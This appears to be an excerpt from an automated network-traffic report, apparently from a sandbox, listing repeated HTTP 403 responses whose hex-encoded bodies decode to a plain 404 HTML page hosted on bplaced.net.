        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:49 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=117X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:50 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=67X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:51 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=108X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:52 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=92X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:53 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=118X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:54 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=130X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:55 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=92X-Content-Type-Options: nosniffX-Frame-Options: sameoriginLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 